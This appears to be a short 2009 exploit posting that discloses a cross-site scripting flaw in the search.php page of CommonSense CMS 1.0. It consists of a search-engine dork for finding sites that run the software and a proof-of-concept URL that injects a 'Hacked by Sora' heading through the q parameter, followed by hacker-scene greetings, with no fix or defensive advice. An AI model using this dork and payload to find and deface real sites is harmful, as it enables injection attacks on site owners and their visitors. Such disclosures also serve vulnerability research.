# Exploit Title: CommonSense CMS XSS Vulnerability
# Date: December 29th, 2009
# Author: Sora
# Software Link: http://www.sensesites.com/
# Version: 1.0
# Tested on: Windows and Linux (Backtrack 3)
----------------------------------------------------
> CommonSense CMS XSS Vulnerability
> Submitted and disclosed by Sora
> Contact: vhr95zw [at] hotmail.com

# Dork: "Powered by CommonSense CMS script"

Description: CommonSense CMS suffers a XSS vulnerability in search.php.

# Code: http://www.site.com/search.php?q=<h2>Hacked by Sora - attack.from.below</h2>
# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!